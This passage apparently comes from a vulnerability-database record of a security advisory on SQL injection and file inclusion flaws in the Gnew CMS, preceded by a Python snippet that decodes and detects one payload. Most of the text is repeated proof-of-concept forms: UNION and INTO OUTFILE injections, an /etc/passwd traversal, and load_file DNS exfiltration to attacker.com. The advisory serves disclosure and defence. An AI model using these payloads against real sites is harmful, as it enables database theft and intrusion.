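           "CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- ")

# Pieces of the CONCAT() argument list: CHAR(n) literals and (select fn()) subqueries.
_PIECE = re.compile(r"CHAR\(\s*(\d+)\s*\)|\(\s*select\s+(\w+)\(\)\s*\)", re.IGNORECASE)

# Detection: load_file() applied to a string that starts with two backslashes,
# whether spelled as CHAR(92),CHAR(92) or as the hex literal 0x5c5c.
_UNC_EXFIL = re.compile(
    r"load_file\s*\(\s*concat\s*\(\s*(?:char\s*\(\s*92\s*\)\s*,\s*char\s*\(\s*92\s*\)|0x5c5c)",
    re.IGNORECASE)


def render_unc_path(payload, sample_values):
    """Render the path the server would pass to the OS, substituting sample
    results for the subqueries (the real server uses the real version())."""
    parts = []
    for match in _PIECE.finditer(payload):
        code, func = match.groups()
        if code is not None:
            parts.append(chr(int(code)))
        else:
            parts.append(sample_values[func.lower()])
    return ''.join(parts)


def unc_host(path):
    """Host component of a UNC path; this is the name Windows resolves via DNS."""
    if not path.startswith('\\\\'):
        raise ValueError('not a UNC path')
    return path[2:].split('\\', 1)[0]


def is_dns_exfil_attempt(value):
    """Cheap check for the construction above in a submitted parameter value."""
    return _UNC_EXFIL.search(value) is not None


if __name__ == '__main__':
    path = render_unc_path(PAYLOAD, {'version': '5.5.25'})
    print(path)                           # \\5.5.25.attacker.com\foobar
    print(unc_host(path))                 # 5.5.25.attacker.com
    print(is_dns_exfil_attempt(PAYLOAD))  # True
```

Two caveats a tester should keep in mind: load_file() needs the FILE privilege for the application's database account, and on a non-Windows host the rendered string is just an odd filename, so no lookup happens, which is why the advisory restricts these PoCs to Windows-hosted databases. The share name (foobar here) is irrelevant; only the host label carries data.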
\n \nThe PoC code below is based on the DNS exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC sends a DNS request for the IP address of a subdomain of \".attacker.com\" (a domain whose DNS server is controlled by the attacker), using the output of `version()` (or any other sensitive value from the database) as the subdomain label: \n \n \n<form action=\"http://[host]/polls/vote.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"add_vote\" value=\"1\"> \n<input type=\"hidden\" name=\"answer_id\" value=\"1\"> \n<input type=\"hidden\" name=\"question_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n \n2.5 The vulnerability exists due to insufficient filtration of the \"story_id\" HTTP POST parameter passed to the \"/comments/add.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database. \n \nThe PoC code below is based on the DNS exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. 
The PoC sends a DNS request for the IP address of a subdomain of \".attacker.com\" (a domain whose DNS server is controlled by the attacker), using the output of `version()` (or any other sensitive value from the database) as the subdomain label: \n \n \n<form action=\"http://[host]/comments/add.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"add\" value=\"1\"> \n<input type=\"hidden\" name=\"preview\" value=\"1\"> \n<input type=\"hidden\" name=\"comment_subject\" value=\"1\"> \n<input type=\"hidden\" name=\"comment_text\" value=\"1\"> \n<input type=\"hidden\" name=\"story_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n \n2.6 The vulnerability exists due to insufficient filtration of the \"story_id\" HTTP POST parameter passed to the \"/comments/edit.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database. \n \nThe PoC code below is based on the DNS exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. 
The PoC sends a DNS request for the IP address of a subdomain of \".attacker.com\" (a domain whose DNS server is controlled by the attacker), using the output of `version()` (or any other sensitive value from the database) as the subdomain label: \n \n \n<form action=\"http://[host]/comments/edit.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"edit\" value=\"1\"> \n<input type=\"hidden\" name=\"preview_edited\" value=\"1\"> \n<input type=\"hidden\" name=\"comment_subject\" value=\"1\"> \n<input type=\"hidden\" name=\"comment_text\" value=\"1\"> \n<input type=\"hidden\" name=\"story_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n \n2.7 The vulnerability exists due to insufficient filtration of the \"thread_id\" HTTP POST parameter passed to the \"/posts/add.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database. \n \nThe PoC code below is based on the DNS exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. 
The PoC sends a DNS request for the IP address of a subdomain of \".attacker.com\" (a domain whose DNS server is controlled by the attacker), using the output of `version()` (or any other sensitive value from the database) as the subdomain label: \n \n \n<form action=\"http://[host]/posts/add.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"add\" value=\"1\"> \n<input type=\"hidden\" name=\"preview\" value=\"1\"> \n<input type=\"hidden\" name=\"thread_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \n \n2.8 The vulnerability exists due to insufficient filtration of the \"thread_id\" HTTP POST parameter passed to the \"/posts/edit.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database. \n \nThe PoC code below is based on the DNS exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. 
The PoC sends a DNS request for the IP address of a subdomain of \".attacker.com\" (a domain whose DNS server is controlled by the attacker), using the output of `version()` (or any other sensitive value from the database) as the subdomain label: \n \n \n<form action=\"http://[host]/posts/edit.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"edit\" value=\"1\"> \n<input type=\"hidden\" name=\"preview_edited\" value=\"1\"> \n<input type=\"hidden\" name=\"thread_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n \nSuccessful exploitation of vulnerabilities 2.3-2.8 requires that the attacker is registered and logged in. Registration is open by default. \n \n \nVulnerabilities 2.1, 2.2 and 2.8 were discovered by Gjoko Krstic (http://packetstormsecurity.com/files/122771) on July 23, 2013. High-Tech Bridge Security Research Lab discovered these vulnerabilities independently and publishes them because they remain unpatched since the vendor notification date. \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nThe vendor did not reply to 6 notifications by email. Currently we are not aware of any official solution for these vulnerabilities. \n \nAn unofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23171-patch.zip \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23171 - https://www.htbridge.com/advisory/HTB23171 - Multiple vulnerabilities in Gnew. \n[2] Gnew - http://www.gnew.fr - Gnew is a simple and open-source Content Management System. 
\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. 
\n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/123482/gnew-lfisql.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:53", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc.", "modified": "2013-10-02T00:00:00", "published": "2013-10-02T00:00:00", "id": "SECURITYVULNS:VULN:13311", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13311", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:49", "bulletinFamily": "software", "description": "\r\n\r\nAdvisory ID: HTB23171\r\nProduct: Gnew\r\nVendor: Raoul Proenca\r\nVulnerable Version(s): 2013.1 and probably prior\r\nTested Version: 2013.1\r\nAdvisory Publication: August 28, 2013 [without technical details]\r\nVendor Notification: August 28, 2013 \r\nPublic Disclosure: October 2, 2013 \r\nVulnerability Type: PHP File Inclusion [CWE-98], SQL Injection [CWE-89]\r\nCVE References: CVE-2013-5639, CVE-2013-5640\r\nRisk Level: High \r\nCVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\nSolution Status: Solution Available\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Gnew, which can be exploited to execute arbitrary PHP code and perform SQL injection attacks against the vulnerable application. 
\r\n\r\n\r\n1) PHP File Inclusion in Gnew: CVE-2013-5639\r\n\r\nThe vulnerability exists due to insufficient validation of user-supplied input passed via the "gnew_language" cookie to the "/users/login.php" script before it is used in the "include()" function. A remote attacker can include and execute arbitrary local files on a vulnerable system via a directory traversal sequence and a URL-encoded NULL byte (the NULL byte truncation of the include path only works on PHP versions older than 5.3.4).\r\n\r\nThe following exploitation example displays the content of the "/etc/passwd" file:\r\n\r\n\r\nGET /users/login.php HTTP/1.1\r\nCookie: gnew_language=../../../etc/passwd%00;\r\n\r\n\r\n\r\n2) SQL Injection in Gnew: CVE-2013-5640\r\n\r\n2.1 The vulnerability exists due to insufficient filtering of the "friend_email" HTTP POST parameter passed to the "/news/send.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in the application's database. Note that the PoC below carries the injection in the "news_id" parameter.\r\n\r\nThe following exploitation example sends the MySQL server version and database username to the email address "attacker@mail.com":\r\n\r\n\r\n<form action="http://[host]/news/send.php" method="post" name="main">\r\n<input type="hidden" name="send" value="1">\r\n<input type="hidden" name="user_name" value="username">\r\n<input type="hidden" name="user_email" value="user@mail.com">\r\n<input type="hidden" name="friend_email" value="attacker@mail.com">\r\n<input type="hidden" name="news_id" value="-1' UNION SELECT version(),user() -- ">\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n\r\n2.2 The vulnerability exists due to insufficient filtering of the "user_email" HTTP POST parameter passed to the "/users/register.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in the application's database.\r\n\r\nThe exploitation example below writes the database username and MySQL server version into the file "/var/www/file.txt". Successful exploitation requires that the MySQL server has write access to the "/var/www" directory and that the database account holds the FILE privilege. 
\r\n\r\n\r\n<form action="http://[host]/users/register.php" method="post" name="main">\r\n<input type="hidden" name="register" value="1">\r\n<input type="hidden" name="user_email" value="' UNION SELECT user(),version() INTO OUTFILE '/var/www/file.txt' -- 2">\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n\r\n2.3 The vulnerability exists due to insufficient filtering of the "answer_id" HTTP POST parameter passed to the "/polls/vote.php" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database.\r\n\r\nThe PoC code below uses the DNS exfiltration technique and only works if the database server of the vulnerable application is hosted on a Windows system (MySQL's load_file() on a UNC path makes Windows resolve the host name). The PoC makes the MySQL server issue a DNS query for a host name whose leftmost label is the output of `version()` (or any other sensitive value selected from the database) under ".attacker.com" (a domain whose authoritative DNS server is controlled by the attacker):\r\n\r\n\r\n<form action="http://[host]/polls/vote.php" method="post" name="main">\r\n<input type="hidden" name="add_vote" value="1">\r\n<input type="hidden" name="answer_id" value="' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- ">\r\n<input type="hidden" name="question_id" value="1">\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n\r\n2.4 The vulnerability exists due to insufficient filtering of the "question_id" HTTP POST parameter passed to the "/polls/vote.php" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database.\r\n\r\nThe PoC code below uses the DNS exfiltration technique and only works if the database server of the vulnerable application is hosted on a Windows system. 
The PoC makes the MySQL server issue a DNS query for a host name whose leftmost label is the output of `version()` (or any other sensitive value selected from the database) under ".attacker.com" (a domain whose authoritative DNS server is controlled by the attacker):\r\n\r\n\r\n<form action="http://[host]/polls/vote.php" method="post" name="main">\r\n<input type="hidden" name="add_vote" value="1">\r\n<input type="hidden" name="answer_id" value="1">\r\n<input type="hidden" name="question_id" value="' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- ">\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n\r\n2.5 The vulnerability exists due to insufficient filtering of the "story_id" HTTP POST parameter passed to the "/comments/add.php" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database.\r\n\r\nThe PoC code below uses the DNS exfiltration technique and only works if the database server of the vulnerable application is hosted on a Windows system. 
The PoC makes the MySQL server issue a DNS query for a host name whose leftmost label is the output of `version()` (or any other sensitive value selected from the database) under ".attacker.com" (a domain whose authoritative DNS server is controlled by the attacker):\r\n\r\n\r\n<form action="http://[host]/comments/add.php" method="post" name="main">\r\n<input type="hidden" name="add" value="1">\r\n<input type="hidden" name="preview" value="1">\r\n<input type="hidden" name="comment_subject" value="1">\r\n<input type="hidden" name="comment_text" value="1">\r\n<input type="hidden" name="story_id" value="' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- ">\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n\r\n2.6 The vulnerability exists due to insufficient filtering of the "story_id" HTTP POST parameter passed to the "/comments/edit.php" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database.\r\n\r\nThe PoC code below uses the DNS exfiltration technique and only works if the database server of the vulnerable application is hosted on a Windows system. 
The PoC makes the MySQL server issue a DNS query for a host name whose leftmost label is the output of `version()` (or any other sensitive value selected from the database) under ".attacker.com" (a domain whose authoritative DNS server is controlled by the attacker):\r\n\r\n\r\n<form action="http://[host]/comments/edit.php" method="post" name="main">\r\n<input type="hidden" name="edit" value="1">\r\n<input type="hidden" name="preview_edited" value="1">\r\n<input type="hidden" name="comment_subject" value="1">\r\n<input type="hidden" name="comment_text" value="1">\r\n<input type="hidden" name="story_id" value="' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- ">\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n\r\n2.7 The vulnerability exists due to insufficient filtering of the "thread_id" HTTP POST parameter passed to the "/posts/add.php" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database.\r\n\r\nThe PoC code below uses the DNS exfiltration technique and only works if the database server of the vulnerable application is hosted on a Windows system. 
The PoC makes the MySQL server issue a DNS query for a host name whose leftmost label is the output of `version()` (or any other sensitive value selected from the database) under ".attacker.com" (a domain whose authoritative DNS server is controlled by the attacker):\r\n\r\n\r\n<form action="http://[host]/posts/add.php" method="post" name="main">\r\n<input type="hidden" name="add" value="1">\r\n<input type="hidden" name="preview" value="1">\r\n<input type="hidden" name="thread_id" value="' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- ">\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\n\r\n2.8 The vulnerability exists due to insufficient filtering of the "thread_id" HTTP POST parameter passed to the "/posts/edit.php" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database.\r\n\r\nThe PoC code below uses the DNS exfiltration technique and only works if the database server of the vulnerable application is hosted on a Windows system. 
The PoC makes the MySQL server issue a DNS query for a host name whose leftmost label is the output of `version()` (or any other sensitive value selected from the database) under ".attacker.com" (a domain whose authoritative DNS server is controlled by the attacker):\r\n\r\n\r\n<form action="http://[host]/posts/edit.php" method="post" name="main">\r\n<input type="hidden" name="edit" value="1">\r\n<input type="hidden" name="preview_edited" value="1">\r\n<input type="hidden" name="thread_id" value="' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- ">\r\n<input type="submit" id="btn">\r\n</form>\r\n\r\n\r\nSuccessful exploitation of vulnerabilities 2.3-2.8 requires that the attacker is registered and logged in. Registration is open by default.\r\n\r\n\r\nVulnerabilities 2.1, 2.2 and 2.8 were discovered by Gjoko Krstic: http://packetstormsecurity.com/files/122771 on July 23, 2013. High-Tech Bridge Security Research Lab discovered these vulnerabilities independently and publishes them because they have remained unpatched since the vendor notification date.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nThe vendor did not reply to 6 notifications by email. 
Currently we are not aware of any official solution for these vulnerabilities.\r\n\r\nAn unofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23171-patch.zip\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23171 - https://www.htbridge.com/advisory/HTB23171 - Multiple vulnerabilities in Gnew.\r\n[2] Gnew - http://www.gnew.fr - Gnew is a simple and open-source Content Management System.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide information that is as accurate as possible. 
The latest version of the Advisory is available on web page [1] in the References.\r\n", "modified": "2013-10-02T00:00:00", "published": "2013-10-02T00:00:00", "id": "SECURITYVULNS:DOC:29857", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29857", "title": "Multiple Vulnerabilities in Gnew", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "htbridge": [{"lastseen": "2017-06-23T23:08:26", "bulletinFamily": "software", "description": "High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Gnew, which can be exploited to execute arbitrary PHP code and perform SQL injection attacks against the vulnerable application. \n \n1) PHP File Inclusion in Gnew: CVE-2013-5639 \nThe vulnerability exists due to insufficient validation of user-supplied input passed via the \"gnew_language\" cookie to the \"/users/login.php\" script before it is used in the \"include()\" function. A remote attacker can include and execute arbitrary local files on a vulnerable system via a directory traversal sequence and a URL-encoded NULL byte (the NULL byte truncation of the include path only works on PHP versions older than 5.3.4). \nThe following exploitation example displays the content of the \"/etc/passwd\" file: \nGET /users/login.php HTTP/1.1 \nCookie: gnew_language=../../../etc/passwd%00; \n \n2) SQL Injection in Gnew: CVE-2013-5640 \n2.1 The vulnerability exists due to insufficient filtering of the \"friend_email\" HTTP POST parameter passed to the \"/news/send.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in the application's database. Note that the PoC below carries the injection in the \"news_id\" parameter. 
\nThe following exploitation example sends the MySQL server version and database username to the email address \"attacker@mail.com\": \n<form action=\"http://[host]/news/send.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"send\" value=\"1\"> \n<input type=\"hidden\" name=\"user_name\" value=\"username\"> \n<input type=\"hidden\" name=\"user_email\" value=\"user@mail.com\"> \n<input type=\"hidden\" name=\"friend_email\" value=\"attacker@mail.com\"> \n<input type=\"hidden\" name=\"news_id\" value=\"-1' UNION SELECT version(),user() -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n2.2 The vulnerability exists due to insufficient filtering of the \"user_email\" HTTP POST parameter passed to the \"/users/register.php\" script. A remote unauthenticated attacker can execute arbitrary SQL commands in the application's database. \nThe exploitation example below writes the database username and MySQL server version into the file \"/var/www/file.txt\". Successful exploitation requires that the MySQL server has write access to the \"/var/www\" directory and that the database account holds the FILE privilege. \n<form action=\"http://[host]/users/register.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"register\" value=\"1\"> \n<input type=\"hidden\" name=\"user_email\" value=\"' UNION SELECT user(),version() INTO OUTFILE '/var/www/file.txt' -- 2\"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n2.3 The vulnerability exists due to insufficient filtering of the \"answer_id\" HTTP POST parameter passed to the \"/polls/vote.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database. \nThe PoC code below uses the DNS exfiltration technique and only works if the database server of the vulnerable application is hosted on a Windows system (MySQL's load_file() on a UNC path makes Windows resolve the host name). 
The PoC makes the MySQL server issue a DNS query for a host name whose leftmost label is the output of `version()` (or any other sensitive value selected from the database) under \".attacker.com\" (a domain whose authoritative DNS server is controlled by the attacker): \n<form action=\"http://[host]/polls/vote.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"add_vote\" value=\"1\"> \n<input type=\"hidden\" name=\"answer_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \"> \n<input type=\"hidden\" name=\"question_id\" value=\"1\"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n2.4 The vulnerability exists due to insufficient filtering of the \"question_id\" HTTP POST parameter passed to the \"/polls/vote.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database. \nThe PoC code below uses the DNS exfiltration technique and only works if the database server of the vulnerable application is hosted on a Windows system. 
The PoC makes the MySQL server issue a DNS query for a host name whose leftmost label is the output of `version()` (or any other sensitive value selected from the database) under \".attacker.com\" (a domain whose authoritative DNS server is controlled by the attacker): \n<form action=\"http://[host]/polls/vote.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"add_vote\" value=\"1\"> \n<input type=\"hidden\" name=\"answer_id\" value=\"1\"> \n<input type=\"hidden\" name=\"question_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n2.5 The vulnerability exists due to insufficient filtering of the \"story_id\" HTTP POST parameter passed to the \"/comments/add.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database. \nThe PoC code below uses the DNS exfiltration technique and only works if the database server of the vulnerable application is hosted on a Windows system. 
The PoC makes the MySQL server issue a DNS query for a host name whose leftmost label is the output of `version()` (or any other sensitive value selected from the database) under \".attacker.com\" (a domain whose authoritative DNS server is controlled by the attacker): \n<form action=\"http://[host]/comments/add.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"add\" value=\"1\"> \n<input type=\"hidden\" name=\"preview\" value=\"1\"> \n<input type=\"hidden\" name=\"comment_subject\" value=\"1\"> \n<input type=\"hidden\" name=\"comment_text\" value=\"1\"> \n<input type=\"hidden\" name=\"story_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n2.6 The vulnerability exists due to insufficient filtering of the \"story_id\" HTTP POST parameter passed to the \"/comments/edit.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database. \nThe PoC code below uses the DNS exfiltration technique and only works if the database server of the vulnerable application is hosted on a Windows system. 
The PoC makes the MySQL server issue a DNS query for a host name whose leftmost label is the output of `version()` (or any other sensitive value selected from the database) under \".attacker.com\" (a domain whose authoritative DNS server is controlled by the attacker): \n<form action=\"http://[host]/comments/edit.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"edit\" value=\"1\"> \n<input type=\"hidden\" name=\"preview_edited\" value=\"1\"> \n<input type=\"hidden\" name=\"comment_subject\" value=\"1\"> \n<input type=\"hidden\" name=\"comment_text\" value=\"1\"> \n<input type=\"hidden\" name=\"story_id\" value=\"' AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- \"> \n<input type=\"submit\" id=\"btn\"> \n</form> \n \n2.7 The vulnerability exists due to insufficient filtering of the \"thread_id\" HTTP POST parameter passed to the \"/posts/add.php\" script. A remote authenticated attacker can execute arbitrary SQL commands in the application's database. \nThe PoC code below uses the DNS exfiltration technique and only works if the database server of the vulnerable application is hosted on a Windows system. 
